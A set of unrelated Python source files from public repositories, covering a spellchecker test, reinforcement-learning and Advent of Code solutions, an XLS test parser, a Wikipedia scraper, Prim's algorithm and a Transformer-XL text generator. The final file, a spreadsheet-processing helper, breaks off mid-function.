    def test_word_not_found(self):
        # A made-up word must not be found.
        self.assertFalse(self.pspell.lookup("phunspell"))
    def test_lookup_list_return_not_found(self):
        # lookup_list returns only the words missing from the dictionary.
        words = "sabrosino anuente ecocardiografável oláceo veneciano borken"
        self.assertListEqual(
            self.pspell.lookup_list(words.split(" ")), ["borken"]
        )
if __name__ == "__main__":
    unittest.main()
| dvwright/phunspell | phunspell/tests/test__pt_BR.py | test__pt_BR.py | py | 604 | python | en | code | 4 | github-code | 36 |
73577359145 | import numpy as np
from src.do_not_touch.result_structures import PolicyAndActionValueFunction
from src.env.GridWorld import GridWorld
class GridWorldMonteCarlo(GridWorld):
    """Monte-Carlo control algorithms on the GridWorld environment."""

    def __init__(self, size: int = 5):
        super().__init__(size)

    def monte_carlo_es(self, num_episodes=1000) -> PolicyAndActionValueFunction:
        """Monte Carlo with Exploring Starts (first-visit updates).

        :param num_episodes: number of episodes to sample.
        :return: greedy policy and action-value function found.
        """
        # Uniform initial policy, zero-initialized Q, and per-pair return lists.
        pi = {state: {action: 1 / len(self.actions) for action in self.actions} for state in self.states}
        q = {state: {action: 0 for action in self.actions} for state in self.states}
        returns = {state: {action: [] for action in self.actions} for state in self.states}
        for _ in range(num_episodes):
            # Exploring start: random state and action.
            state = tuple(np.random.choice(range(5), size=2))
            action = np.random.choice(self.actions)
            episode = []
            while state not in [(0, 4), (4, 4)]:  # stop states
                # NOTE(review): transition_probability is used here as if it
                # returned a reward — confirm against the GridWorld base class.
                reward = self.transition_probability(state, action, state, 1)
                episode.append((state, action, reward))
                state = tuple(np.random.choice(range(5), size=2))
                action = np.random.choice(self.actions)
            # Backward pass: accumulate the return G and apply first-visit
            # updates.
            g = 0
            for t in reversed(range(len(episode))):
                state, action, reward = episode[t]
                g = reward + g
                # BUGFIX: the original compared (state, action) against the
                # *whole* episode, so the first-visit condition was never true
                # and Q was never updated.  Compare only against steps before t.
                if (state, action) not in [(x[0], x[1]) for x in episode[:t]]:
                    returns[state][action].append(g)
                    q[state][action] = np.mean(returns[state][action])
                    # Greedy policy improvement for this state.
                    best_action = max(q[state], key=q[state].get)
                    for a in pi[state].keys():
                        pi[state][a] = 1 if a == best_action else 0
        return PolicyAndActionValueFunction(pi, q)

    def on_policy_first_visit_monte_carlo_control(self) -> PolicyAndActionValueFunction:
        """Not implemented yet."""
        pass

    def off_policy_monte_carlo_control(self) -> PolicyAndActionValueFunction:
        """Not implemented yet."""
        pass

    def execute(self):
        """Run every algorithm of this environment and print the results."""
        print(f"Environment \033[1m{self.__class__.__name__}\033[0m")
        print("\n")
        print("\t \033[1mMonte Carlo ES\033[0m")
        print("\t", self.monte_carlo_es())
        print("\n")
        print("\t \033[1mOn Policy First Visit Monte Carlo Control\033[0m")
        print("\t", self.on_policy_first_visit_monte_carlo_control())
        print("\n")
        print("\t \033[1mOff Policy Monte Carlo Control\033[0m")
        print("\t", self.off_policy_monte_carlo_control())
        print("\n")
| divinoPV/deep_reinforcement_learning_on_several_envs | src/Algorithm/MonteCarlo/GridWorld.py | GridWorld.py | py | 2,445 | python | en | code | 0 | github-code | 36 |
34752581629 | test_input = '''R 4
U 4
L 3
D 1
R 4
D 1
L 5
R 2
'''
# Larger worked example from the AoC day 9 part-two description (answer: 36).
test_input2 = '''R 5
U 8
L 8
D 3
R 17
D 10
L 25
U 20
'''
from math import copysign
# The real puzzle input sits next to this script as day_09_input.txt.
puzzle_input = open(__file__.replace('.py', '_input.txt')).read()
class State:
    """Simulates the rope from AoC 2022 day 9.

    ``knots[0]`` is the head; every other knot follows its predecessor.  The
    set ``visited_locations`` records each position the tail knot occupies.
    """

    def __init__(self, knots=2):
        self.visited_locations = set()
        self.knots = [[0, 0] for _ in range(knots)]

    def distance_from_neighbor(self, knot):
        """(dx, dy) from knot ``knot`` to the knot directly ahead of it."""
        ahead = self.knots[knot - 1]
        here = self.knots[knot]
        return ahead[0] - here[0], ahead[1] - here[1]

    def move_head(self, offset):
        """Shift the head knot by ``offset``."""
        hx, hy = self.knots[0]
        self.knots[0] = [hx + offset[0], hy + offset[1]]

    def move_knot(self, knot):
        """Pull knot ``knot`` one step toward its predecessor if it lags."""
        dx, dy = self.distance_from_neighbor(knot)
        step = [0, 0]
        # The knot moves only when it is more than one cell away on some
        # axis; it then steps one cell toward the predecessor on every axis
        # where they differ (a straight or diagonal move).
        if abs(dx) > 1 or abs(dy) > 1:
            if dx:
                step[0] = int(copysign(1, dx))
            if dy:
                step[1] = int(copysign(1, dy))
        cx, cy = self.knots[knot]
        self.knots[knot] = [cx + step[0], cy + step[1]]
        if knot == len(self.knots) - 1:
            self.visited_locations.add(tuple(self.knots[knot]))

    def parse_input(self, input_):
        """Expand 'R 4'-style lines into unit moves stored in ``self.moves``."""
        unit = {'R': [1, 0], 'L': [-1, 0], 'U': [0, 1]}
        self.moves = []
        for line in input_.splitlines():
            direction, count = line.split(' ')
            # Anything that is not R/L/U is treated as a downward move,
            # matching the original if/elif/else chain.
            self.moves.extend([unit.get(direction, [0, -1])] * int(count))

    def solve(self, input_):
        """Run the simulation and return how many cells the tail visited."""
        self.parse_input(input_)
        for move in self.moves:
            self.move_head(move)
            for k in range(1, len(self.knots)):
                self.move_knot(k)
        return len(sorted(self.visited_locations))
# Sanity checks against the worked examples from the puzzle description.
test1 = State(2)
assert test1.solve(test_input) == 13
test2 = State(10)
assert test2.solve(test_input) == 1
test3 = State(10)
assert test3.solve(test_input2) == 36
# Solve the real input for both parts (2 knots, then 10 knots).
x = State(2)
print(f'Part One: {x.solve(puzzle_input)}')
x = State(10)
print(f'Part Two: {x.solve(puzzle_input)}')
| techartorg/Advent_of_Code_2022 | rob_kovach/day_09.py | day_09.py | py | 2,456 | python | en | code | 4 | github-code | 36 |
7282602903 | ################################################################################
# 1. Including files
################################################################################
import xlrd
################################################################################
# 2. Class definition
################################################################################
class testSuiteCollection:
    """One test suite: a name plus the test cases collected for it."""

    def __init__(self, test_suite_name):
        self.test_suite_name = str(test_suite_name)
        # BUGFIX: was a class-level list shared by every instance; make it a
        # per-instance attribute so suites do not leak test cases into each
        # other.
        self.testcases = []
class testcaseCollection:
    """One test case: the function under test, its parameters and globals."""

    def __init__(self, function_name, testcase_name):
        self.function_name = str(function_name)
        self.testcase_name = str(testcase_name)
        self.invoked_func_precondition = ""
        # BUGFIX: params/global_vars were class-level lists shared by every
        # instance; initialize them per instance instead.
        self.params = []
        self.global_vars = []
class globalVarCollection:
    """Expected/actual description of one global variable after a test."""

    def __init__(self, gen_name, type, expected, actual_mem, mask):
        # Everything is normalized to str because the values come from XLS
        # cells, which xlrd may return as floats.
        # (Removed the redundant class-level defaults: __init__ always sets
        # every attribute on the instance.)
        self.gen_name = str(gen_name)
        self.type = str(type)
        self.expected = str(expected)
        self.actual_mem = str(actual_mem)
        self.mask = str(mask)
class paramCollection:
    """Description of one function parameter and its initial value."""

    def __init__(self, gen_name, type, param_name, init_value, isStructType):
        # Normalized to str: the values originate from XLS cells.
        # (Removed the redundant class-level defaults: __init__ always sets
        # every attribute on the instance.)
        self.gen_name = str(gen_name)
        self.type = str(type)
        self.param_name = str(param_name)
        self.init_value = str(init_value)
        # "True"/"False" as strings, matching isStructure()'s return type.
        self.isStructType = str(isStructType)
################################################################################
# 3. Function definition
################################################################################
def find_output_position(firstParamColumn):
    """Return the column index where the "Output" section header is found.

    NOTE(review): reads the module-level global ``sheet`` (the currently
    open worksheet) — consider passing it in as a parameter.
    """
    output_position = firstParamColumn # assume that there is no INPUT data,
                                       # and OUTPUT data begins at first param column.
    for i in range(sheet.ncols):
        # Row 2 holds the section headers; the last "Output" match wins.
        if "Output" == sheet.cell_value(2, i):
            output_position = i
    return output_position
def isStructure(type):
    """Return "True" if the type name contains "Struct_", else "False".

    Returns strings rather than booleans because callers store the value
    as text.
    """
    return "True" if type.find("Struct_") != -1 else "False"
################################################################################
# 4. Main processing: XLS file parsing
################################################################################
loc = ("C:\\Users\\PC\\Documents\\GitHub\\STM32F4Discovery\\UT_TestSuite.xls")
# Open Workbook
testcaseSheetList = [6, 8, 9, 10]
firstParamColumn = 3
tcFirstLine = 5
tcNameColumn = 0
tcInvokedFuncColumn = 1
ioTypeRow = 4
ioNameRow = 3
testSuite = testSuiteCollection("ut_usart_driver")
# Open XLS file
wb = xlrd.open_workbook(loc)
for tcSheet in testcaseSheetList:
# Open a sheet
sheet = wb.sheet_by_index(tcSheet)
noRows = sheet.nrows
noCols = sheet.ncols
func_name = sheet.cell_value(0, 1)
output_position = find_output_position(firstParamColumn)
for i in range(tcFirstLine, noRows):
testcase_name = sheet.cell_value(i, tcNameColumn)
testcase_invoked_func = sheet.cell_value(i, tcInvokedFuncColumn)
noParams = (output_position - firstParamColumn) // 2 # division with result of integer number
noGlobalVars = (noCols - output_position) // 2 # division with result of integer number
testcase = testcaseCollection(func_name, testcase_name)
testcase.invoked_func_precondition = testcase_invoked_func
testcase.params = [None]*noParams
testcase.global_vars = [None]*noGlobalVars
# Collect all parameters
index = 0
for j in range(firstParamColumn, output_position, 2):
gen_name = "param_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
param_name = sheet.cell_value(ioNameRow, j) # unchanged
init_value = sheet.cell_value(i, j)
isStructType = isStructure(type)
testcase.params[index] = \
paramCollection(gen_name, type, param_name, init_value, isStructType)
index += 1
# Collect all global variables
index = 0
for j in range(output_position, noCols - 1, 2):
gen_name = "global_var_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
expected = sheet.cell_value(i, j)
actual_mem = sheet.cell_value(ioNameRow, j) # unchanged
mask = sheet.cell_value(i, j + 1)
testcase.global_vars[index] = \
globalVarCollection(gen_name, type, expected, actual_mem, mask)
index += 1
testSuite.testcases.append(testcase)
| duattn1/STM32F4Discovery_Unit_Testing | Script/UnitTestScript/XlsProcessing.py | XlsProcessing.py | py | 4,938 | python | en | code | 0 | github-code | 36 |
15119831760 | import requests
def get_page(name):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "query",
"list": "search",
"srsearch": name,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
def get_page_content(pageid):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "parse",
"pageid": pageid,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
from bs4 import BeautifulSoup
def get_information(name):
    """Scrape address / SIREN / website for a company from French Wikipedia.

    Returns a dict with whichever of the keys 'address', 'siren', 'website'
    could be found, or None if anything goes wrong (errors are printed).
    """
    try:
        result = get_page(name)
        # Use the first search hit's page id.
        content = get_page_content(result['query']['search'][0]['pageid'])
        html = content['parse']['text']['*']
        dom = BeautifulSoup(html, "html.parser")
        # The infobox keeps labels in <th> cells and values in sibling <td>s.
        th = dom.find_all('th')
        information = {}
        for i in range(len(th)):
            if th[i].text == "Siège":
                information["address"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
            if th[i].text == "SIREN":
                information["siren"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
            if th[i].text == "Site web" or th[i].text == "Sites web":
                link = th[i].find_next_sibling('td').find('a')
                if link:
                    information["website"] = link.get('href')
        return information
    except Exception as error:
        print(error)
        return None
| PjuchNicz/Projet-ISKR | python/enrichment/wikipedia.py | wikipedia.py | py | 2,040 | python | en | code | 0 | github-code | 36 |
42154318378 | # 색종이 만들기
import sys
input = sys.stdin.readline
case = int(input())
maps = [list(map(int, input().split())) for _ in range(case)]
white = 0
blue = 0
def dq(maps, x, y, l): # x y l
global white, blue
tmp = maps[x][y]
for i in range(x, x+l):
for j in range(y, y+l):
if maps[i][j] != tmp:
dq(maps, x, y, l // 2)
dq(maps, x + l // 2, y, l // 2)
dq(maps, x, y + l // 2, l // 2)
dq(maps, x + l // 2, y + l // 2, l // 2)
return
if not tmp:
blue += 1
else:
white += 1
dq(maps, 0, 0, case)
print(blue)
print(white)
| FeelingXD/algorithm | beakjoon/2630.py | 2630.py | py | 662 | python | en | code | 2 | github-code | 36 |
39054330190 | from brainrender.Utils.camera import set_camera
import brainrender
from brainrender.Utils.camera import set_camera_params
from brainrender_gui import App
from brainrender_gui.widgets.actors_list import update_actors_list
from brainrender_gui_mod.scene_mod import SceneMod, MyInteractorStyle
from brainrender_gui_mod.widgets.credits import CreditsWindow
from brainrender_gui_mod.ui_mod import UIMod
from brainrender_gui_mod.apputils.regions_control_mod import RegionsControlMod
from brainrender_gui_mod.apputils.actors_control_mod import ActorsControlMod
class AppMod(
    App, SceneMod, UIMod, RegionsControlMod, ActorsControlMod,
):
    """brainrender GUI application with clipping/pipette extensions.

    Mixes the modified scene, UI, region and actor controls into the stock
    brainrender App.  ``store`` caches the clipped meshes already rendered so
    that _update only touches actors that changed.

    NOTE(review): ``store`` is a class-level mutable dict, shared across
    instances — presumably only one AppMod exists at a time; confirm.
    """
    store = {}
    # Hand-tuned camera parameters for the fixed sagittal view.
    fixed_sagittal_camera = dict(
        position=[3998.434612221822, 3745.8134440474814, 48593.38552676014],
        focal=[6587.835, 3849.085, 5688.164],
        viewup=[0.009118000372890485, -0.9999526965279836, -0.003386262779896527],
        distance=42972.44034956067,
        clipping=[36210.473627528314, 58330.894218958376],
    )
    def __init__(self, *args, **kwargs):
        super(AppMod, self).__init__(atlas='allen_mouse_10um', **kwargs)
        # Initialize parent classes
        SceneMod.__init__(self)
        UIMod.__init__(self, **kwargs)
        RegionsControlMod.__init__(self)
        ActorsControlMod.__init__(self)
        # FIXED: if there are any actors at all in the list, select the first one
        # This fixes the error that occurs if the user clicks the properties before an actor is selected
        if self.actors_list.count() > 0:
            self.actors_list.setCurrentRow(0)
            self.actor_list_clicked(0)
        # MODIFIED: set the root alpha in the beginning to 0.5 and write that to the textbox
        self.scene.root.alpha(0.5)
        self.alpha_textbox.setText('0.5')
        # ADDED: Connect the new buttons to their functions
        self.buttons['new_show_structures_tree'].clicked.connect(self.toggle_treeview)
        self.buttons['show_actor_menu'].clicked.connect(self.toggle_actor_menu)
        self.buttons['switch_reference_point'].clicked.connect(self.toggle_reference_point)
        self.injection_slider.valueChanged.connect(self.update_injection_volume)
        self.update_plotter()
    # ADDED: Method to toggle the actor menu (right bar)
    def toggle_actor_menu(self):
        """Show/hide the actor menu and flip the button label accordingly."""
        if not self.actor_menu.isHidden():
            self.buttons["show_actor_menu"].setText(
                "Show actor menu"
            )
        else:
            self.buttons["show_actor_menu"].setText(
                "Hide actor menu"
            )
        self.actor_menu.setHidden(not self.actor_menu.isHidden())
    # ADDED: Method to switch the reference point for the clipping
    def toggle_reference_point(self):
        """Switch the clipping reference between the brain root and pipette tip."""
        if self.buttons["switch_reference_point"].text() == 'Brain':
            self.buttons["switch_reference_point"].setText(
                'Pipette tip'
            )
            self.current_reference_point = 'pipette_tip'
            self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
        else:
            self.buttons["switch_reference_point"].setText(
                'Brain'
            )
            self.current_reference_point = 'root'
            self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
        self.update_clippers(force_update=True)
        # Fake a button press to force canvas update
        self.scene.plotter.interactor.MiddleButtonPressEvent()
        self.scene.plotter.interactor.MiddleButtonReleaseEvent()
    # ADDED: Method to update the simulated injected volume
    def update_injection_volume(self, value):
        """Resize the simulated ink blob to match the slider value (nl)."""
        self.injection_label.setText(f'Injection volume: {value : 3} nl')
        # NOTE(review): radius = 2 * volume is a hand-tuned visual scale,
        # not a physical conversion — confirm intent.
        ink_radius = value * 2
        self.pipette_dict['ink_blob_source'].SetRadius(ink_radius)
        self.pipette_dict['ink_blob_source'].Update()
        # Fake a button press to force canvas update
        self.scene.plotter.interactor.MiddleButtonPressEvent()
        self.scene.plotter.interactor.MiddleButtonReleaseEvent()
    def update_plotter(self):
        """Hook the camera observer and install the custom interactor style."""
        self.scene.plotter.camera.AddObserver('ModifiedEvent', self.CameraModifiedCallback)
        self.scene.plotter.interactor.SetInteractorStyle(MyInteractorStyle(self))
    def _update(self):
        """
        Updates the scene's Plotter to add/remove
        meshes
        """
        self.scene.apply_render_style()
        if self.camera_orientation is not None:
            if self.camera_orientation != "sagittal":
                set_camera(self.scene, self.camera_orientation)
            else:
                set_camera_params(self.scene.plotter.camera, self.fixed_sagittal_camera)
            self.camera_orientation = None
        self.scene.plotter.camera.SetFocalPoint(self.get_reference_point())
        # Get actors to render
        self._update_actors()
        # REMOVED: the actors will not be reloaded every single update
        # instead we check which ones were added/removed below
        '''
        to_render = [act for act in self.actors.values() if act.is_visible]
        # Set actors look
        meshes = [act.mesh.c(act.color).alpha(act.alpha) for act in to_render]
        # Add axes
        if self.axes is not None:
            meshes.append(self.axes)
        # update actors rendered
        self.scene.plotter.show(
            *meshes, interactorStyle=0, bg=brainrender.BACKGROUND_COLOR,
        )
        '''
        # ADDED: a quick check whether the plotter was initialized before
        if not self.scene.plotter.initializedPlotter:
            self.scene.plotter.show(interactorStyle=0, bg=brainrender.BACKGROUND_COLOR,)
        # ADDED: make lists of which actors are to render and which ones are already in the scene, to prevent
        # unnecessary updates
        to_show = {key: values for key, values in self.actors.items() if values.is_visible}
        already_rendered = [key for key in self.store.keys()]
        # Render only the new actors
        for actor in already_rendered:
            if actor in to_show:
                # Refresh color/alpha of actors that stay visible.
                self.store[actor]['ClippedMesh'].c(self.actors[actor].color)
                self.store[actor]['ClippedMesh'].alpha(self.actors[actor].alpha)
                self.store[actor]['Cap'].c(self.actors[actor].color)
                self.store[actor]['Cap'].alpha(self.actors[actor].alpha)
            else:
                # Hide actors that are no longer visible instead of removing them.
                self.store[actor]['ClippedMesh'].alpha(0)
                self.store[actor]['Cap'].alpha(0)
        # Fake a button press to force canvas update
        self.scene.plotter.interactor.MiddleButtonPressEvent()
        self.scene.plotter.interactor.MiddleButtonReleaseEvent()
        # Update list widget
        update_actors_list(self.actors_list, self.actors)
    def open_credits_dialog(self):
        """Open the credits window."""
        self.credits_dialog = CreditsWindow(self, self.palette)
| Marti-Ritter/Portfolio | Injection Interface (Python)/app_mod.py | app_mod.py | py | 6,864 | python | en | code | 0 | github-code | 36 |
8625978148 | import os
import torch
def load_checkpoint(path):
    """Load a training checkpoint onto the current CUDA device.

    If *path* is a directory, 'checkpoint_best.pt' inside it is loaded.
    """
    if os.path.isdir(path):
        path = os.path.join(path, 'checkpoint_best.pt')
    device = f'cuda:{torch.cuda.current_device()}'
    print(f'Loading checkpoint from {path}')
    return torch.load(path, map_location=device)
# Load the checkpoint (a directory path resolves to checkpoint_best.pt inside it).
ckpt = load_checkpoint("./LM-TFM/")
# # adaptive softmax / embedding
# NOTE(review): the first cutoffs assignment is immediately overwritten below,
# and tie_projs is never used afterwards in this script.
cutoffs, tie_projs = [], [False]
cutoffs = [19997, 39997, 199997]
tie_projs += [True] * len(cutoffs)
# Base hyper-parameters for the Transformer-XL configuration.
model_config_base = {
    'dropout' : 0.1,
    'dropatt' : 0.0,
    'tie_weight' : False,
    'div_val' : 1,
    'pre_lnorm' : True,
    'cutoffs' : cutoffs,
    'clamp_len' : 400,
}
from transformers import TransfoXLTokenizer, TransfoXLLMHeadModel, TransfoXLConfig
# Initializing a Transformer XL configuration
configuration = TransfoXLConfig.from_dict(model_config_base)
# To match with pre-trained model
configuration.d_embed, configuration.d_head = 512, 64
configuration.d_inner, configuration.d_model = 2048, 512
configuration.mem_len, configuration.n_head = 192, 8
configuration.n_layer, configuration.tgt_len = 16, 192
configuration.vocab_size = 32000
# Build the model from the checkpoint's state dict rather than a hub download.
model = TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path=None, state_dict=ckpt['model_state'], config=configuration)
from transformers import PreTrainedTokenizer
from utils.tokenization_sentencepiece import FullTokenizer
from collections import Counter, OrderedDict
from os.path import join, exists
class Vocab(TransfoXLTokenizer):
    """Transformer-XL tokenizer backed by a SentencePiece model.

    Uses ``FullTokenizer`` for the actual sub-word segmentation and builds
    the symbol<->id vocabulary from ``vocab_file``.
    """

    def __init__(
        self,
        special=None,
        min_freq=0,
        max_size=None,
        lower_case=False,
        delimiter=None,
        vocab_file='./data/mn_cased.vocab',
        never_split=None,
        unk_token="<unk>",
        eos_token="</s>",
        additional_special_tokens=None,
        **kwargs
    ):
        # Avoid a mutable default argument; the original used
        # additional_special_tokens=["<formula>"] directly.
        if additional_special_tokens is None:
            additional_special_tokens = ["<formula>"]
        super().__init__(
            unk_token=unk_token, eos_token=eos_token, additional_special_tokens=additional_special_tokens, **kwargs
        )
        self.vocab_file = vocab_file
        # Lazily-created SentencePiece tokenizer shared by all tokenize() calls.
        self._sp_tokenizer = None
        if vocab_file is not None:
            self.build_vocab()

    def _get_sp_tokenizer(self):
        """Return the cached SentencePiece ``FullTokenizer``.

        The original implementation constructed a new FullTokenizer -- and
        therefore re-loaded the SentencePiece model from disk -- on every
        tokenize() call; building it once avoids that cost.
        NOTE(review): model/vocab paths are hard-coded to ./data, mirroring
        the original code, rather than derived from self.vocab_file.
        """
        if getattr(self, '_sp_tokenizer', None) is None:
            self._sp_tokenizer = FullTokenizer(
                model_file=join('./data', 'mn_cased.model'),
                vocab_file=join('./data', 'mn_cased.vocab'), do_lower_case=False)
        return self._sp_tokenizer

    def tokenize(self, line, add_eos=False, add_double_eos=False):
        """Split *line* into sub-word symbols, optionally adding EOS markers."""
        tokenizer = self._get_sp_tokenizer()
        line = line.strip()
        # convert to lower case
        if self.lower_case:
            line = line.lower()

        # empty delimiter '' will evaluate False
        if self.delimiter == '':
            symbols = line
        else:
            symbols = tokenizer.tokenize(line)

        if add_double_eos:  # lm1b
            return ['<S>'] + symbols + ['<S>']
        elif add_eos:
            return symbols + ['<eos>']
        else:
            return symbols

    def _build_from_file(self, vocab_file):
        """Populate idx2sym/sym2idx from a one-symbol-per-line vocab file."""
        self.idx2sym = []
        self.sym2idx = OrderedDict()

        # NOTE(review): a blank line in the vocab file would raise IndexError
        # on the [0] below; assumes the file has no blank lines.
        with open(vocab_file, 'r') as f:
            for line in f:
                symb = line.strip().split()[0]
                self.add_symbol(symb)
        self.unk_idx = self.sym2idx['<unk>']

    def build_vocab(self):
        """Build the vocabulary, either from a file or from collected counts."""
        if self.vocab_file:
            print('building vocab from {}'.format(self.vocab_file))
            self._build_from_file(self.vocab_file)
            print('final vocab size {}'.format(len(self)))
        else:
            print('building vocab with min_freq={}, max_size={}'.format(
                self.min_freq, self.max_size))
            self.idx2sym = []
            self.sym2idx = OrderedDict()

            for sym in self.special:
                self.add_special(sym)

            for sym, cnt in self.counter.most_common(self.max_size):
                if cnt < self.min_freq: break
                self.add_symbol(sym)

            print('final vocab size {} from {} unique tokens'.format(
                len(self), len(self.counter)))
# Prepare the model for GPU inference with fp16 weights.
model.to('cuda')
model.eval()
model.half()
# Tokenizer instance used by text_generation below.
cool_tokenizer = Vocab()
# reference - https://github.com/huggingface/transformers/blob/2ba147ecffa28e5a4f96eebd09dcd642117dedae/examples/run_generation.py
def text_generation(prompt_text, temp, topk, topp, beams, penalty, do_sample):
    """Generate a continuation of *prompt_text* using the module-level model.

    Sampling is controlled by temperature, top-k / top-p, beam count,
    repetition penalty and the do_sample flag; generation is capped at
    20 tokens, and only the first returned sequence is decoded.
    """
    input_ids = cool_tokenizer.encode(prompt_text, return_tensors="pt").to('cuda')
    sequences = model.generate(
        input_ids=input_ids,
        max_length=20,
        temperature=temp,
        top_k=topk,
        top_p=topp,
        num_beams=beams,
        repetition_penalty=penalty,
        do_sample=do_sample,
    )
    # Batch size == 1. to add more examples please use num_return_sequences > 1
    token_ids = sequences[0].tolist()
    decoded = cool_tokenizer.decode(token_ids, skip_special_tokens=True, clean_up_tokenization_spaces=True)
    # Strip the SentencePiece word-boundary marker from every token.
    cleaned = [word.replace("▁", " ") for word in decoded.split()]
    return ' '.join(cleaned)
print(text_generation("УИХ ", temp=1.0, topk=5, topp=1, beams=1, penalty=1.0, do_sample=True)) | enod/Nvidia-Transformer-XL | pytorch/generate.py | generate.py | py | 5,024 | python | en | code | 5 | github-code | 36 |
37339861285 | import heapq
def make_graph():
    # identical graph as the YouTube video: https://youtu.be/cplfcGZmX7I
    # Adjacency lists hold (cost, neighbor, source) tuples.
    adjacency = {
        'A': [(3, 'D'), (3, 'C'), (2, 'B')],
        'B': [(2, 'A'), (4, 'C'), (3, 'E')],
        'C': [(3, 'A'), (5, 'D'), (6, 'F'), (1, 'E'), (4, 'B')],
        'D': [(3, 'A'), (5, 'C'), (7, 'F')],
        'E': [(8, 'F'), (1, 'C'), (3, 'B')],
        'F': [(9, 'G'), (8, 'E'), (6, 'C'), (7, 'D')],
        'G': [(9, 'F')],
    }
    return {node: [(cost, nbr, node) for cost, nbr in edges]
            for node, edges in adjacency.items()}
def prims(G, start='A'):
    """Compute a minimum spanning tree of *G* with Prim's algorithm.

    Parameters
    ----------
    G : dict mapping node -> list of (cost, neighbor, node) edge tuples.
    start : node to grow the tree from.

    Returns
    -------
    (MST, total_cost) where MST is a list of (from_node, to_node, cost)
    tuples in the order the edges were added.

    Notes
    -----
    Assumes the graph is connected (a disconnected graph eventually pops
    from an empty heap).  Unlike the original version, the caller's
    adjacency lists are not mutated (the start node's edge list is copied
    before being heapified), and visited/unvisited membership tests are
    O(1) sets instead of O(n) lists.
    """
    unvisited = set(G.keys())
    visited = set()
    total_cost = 0
    MST = []

    unvisited.remove(start)
    visited.add(start)

    # Copy so heapify/heappush do not mutate the caller's adjacency list.
    heap = list(G[start])
    heapq.heapify(heap)

    while unvisited:
        cost, n2, n1 = heapq.heappop(heap)
        new_node = None
        # A usable edge has exactly one endpoint already in the tree.
        if n1 in unvisited and n2 in visited:
            new_node = n1
            MST.append((n2, n1, cost))
        elif n1 in visited and n2 in unvisited:
            new_node = n2
            MST.append((n1, n2, cost))

        if new_node is not None:
            unvisited.remove(new_node)
            visited.add(new_node)
            total_cost += cost
            for edge in G[new_node]:
                heapq.heappush(heap, edge)

    return MST, total_cost
def main():
    """Build the demo graph, run Prim's algorithm from 'A', print the result."""
    graph = make_graph()
    tree, cost = prims(graph, 'A')
    print(f'Minimum spanning tree: {tree}')
    print(f'Total cost: {cost}')
main()
| msambol/dsa | minimum_spanning_trees/prims.py | prims.py | py | 1,520 | python | en | code | 211 | github-code | 36 |
16673314825 | #!/usr/bin/python3
import numpy as np
# Puzzle state parsed from 13/input.txt.
# `input` (shadows the builtin): dot coordinates as [x, y] pairs.
# `folds`: fold instructions as [axis_letter, line_number] pairs, e.g. ['y', 7].
# `dims`: largest x / y seen; converted to grid width/height below.
input = []
folds = []
dims = [0, 0]
with open('13/input.txt', 'r') as f:
    l = input
    for line in f.readlines():
        if line.count(',') > 0:
            # Coordinate line "x,y": record it and track the grid extent.
            l = list(map(int, line.strip().split(',')))
            for i in [0,1]:
                if l[i] > dims[i]:
                    dims[i] = l[i]
            input.append(l)
        elif line.count('=') > 0:
            # Fold line like "fold along y=7": keep the axis letter and line number.
            l = line.strip().split('=')
            folds.append([l[0][-1], int(l[1])])
# Extents are maximum indices; +1 converts them to sizes.
for i in [0,1]:
    dims[i] += 1
def printpaper(p):
    """Print the boolean grid *p*: '#' for marked cells, '.' otherwise."""
    rendered = ['']  # leading empty entry reproduces the blank first line
    for row in p:
        rendered.append(''.join('#' if cell else '.' for cell in row))
    print('\n'.join(rendered))
def foldy(paper, fold):
    """Fold *paper* upward along the horizontal line at row index *fold*.

    Rows below the fold line are mirrored onto the rows above it; a result
    cell is True if either overlapping cell was True.  The fold-line row
    itself is dropped.  Assumes both halves have matching sizes -- as in the
    puzzle input -- otherwise the indexing below raises IndexError.
    """
    top = paper[:fold]
    bottom = paper[fold + 1:]
    bottom.reverse()
    merged = []
    for r in range(len(top)):
        merged.append([top[r][c] or bottom[r][c] for c in range(len(top[0]))])
    return merged
def fold(paper, fold):
    """Apply one fold instruction: 'y' folds rows directly, anything else
    ('x') folds columns by transposing, folding rows, and transposing back."""
    if fold[0] == 'y':
        return foldy(paper, fold[1])
    transposed = np.array(paper).T.tolist()
    return np.array(foldy(transposed, fold[1])).T.tolist()
# Build the dot grid (row index = y, column index = x) and mark each dot.
paper = [[False for x in range(dims[0])] for y in range(dims[1])]
for x, y in input:
    paper[y][x] = True
# Apply every fold instruction in order, then render the folded sheet.
npl = paper
for f in folds:
    npl = fold(npl, f)
printpaper(npl)
| chaserobertson/advent | 2021/13/1.py | 1.py | py | 1,421 | python | en | code | 0 | github-code | 36 |
34526548926 | import numpy as np
import openpyxl as op
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import requests
import datetime as dt
import os
import xlrd
def read_table(path):
    """Load the active sheet of an Excel workbook into a DataFrame,
    using the sheet's first row as the column headers."""
    workbook = op.load_workbook(path)
    sheet = workbook.active
    raw = pd.DataFrame(sheet.values)
    header = raw.iloc[0, :]
    return pd.DataFrame(raw.iloc[1:].values, columns=header)
def is_contain_chinese(check_str):
    """Return True if *check_str* contains any non-Latin-1 character.

    The ord(ch) > 255 test is a heuristic that flags CJK (and any other
    non-Latin-1) characters, which is how this pipeline detects "Chinese"
    values.  Unlike the original, this always returns a bool (the original
    implicitly returned None for the negative case).
    """
    return any(ord(ch) > 255 for ch in check_str)
def is_chinese(l):
    """
    删除list里含有中文的字符串
    :param l: 待检测的字符串list
    :return: 删去中文字符串后的list

    Keeps only the entries of *l* for which is_contain_chinese() is falsy.
    Entries that raise (e.g. non-iterable float NaN values as produced by
    pandas .unique()) are silently skipped.  The original used a bare
    ``except:``, which also swallowed KeyboardInterrupt/SystemExit; this
    version narrows the handler to Exception.
    """
    kept = []
    for item in l:
        try:
            if not is_contain_chinese(item):
                kept.append(item)
        except Exception:
